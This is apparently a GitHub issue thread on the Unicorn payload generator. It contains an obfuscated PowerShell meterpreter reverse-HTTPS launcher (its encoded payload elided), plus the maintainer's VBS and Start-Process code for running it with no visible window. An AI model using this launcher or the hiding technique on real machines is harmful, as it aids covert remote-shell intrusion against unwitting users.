### ISSUE TITLE
-WindowStyle hidden -- not working

### ISSUE THREAD

**Issue by xajyvi** [trustedsec/unicorn#69]
Hey @trustedsec Unicorn generated the below powershell payload:
```
$ python unicorn.py windows/meterpreter/reverse_https 192.168.1.7 443

powershell /w 1 /C "s''v yLz -;s''v tB e''c;s''v XN ((g''v yLz).value.toString()+(g''v tB).value.toString());powershell (g''v XN).value.toString() ('[long encoded string here]'+'==')"
```
It works well but I'm trying to execute it using a .cmd or .vbs file and doing so (even with -WindowStyle hidden) causes the console window to popup. Is it possible to execute the powershell payload without displaying any windows? What's the recommended delivery method?

**Comment by trustedsec** [comment]
If you are running this in a VBS, easiest way would be something like this:

https://www.faqforge.com/windows/how-to-execute-powershell-scripts-without-pop-up-window/

command = "powershell.exe -nologo -command C:\Users\howtoforge\Desktop\loop.ps1"
set shell = CreateObject("WScript.Shell")
shell.Run command,0

Should address the popups. Can use something like start-process as well:

start-process PowerShell.exe -arg location\moo.ps1 -WindowStyle Hidden
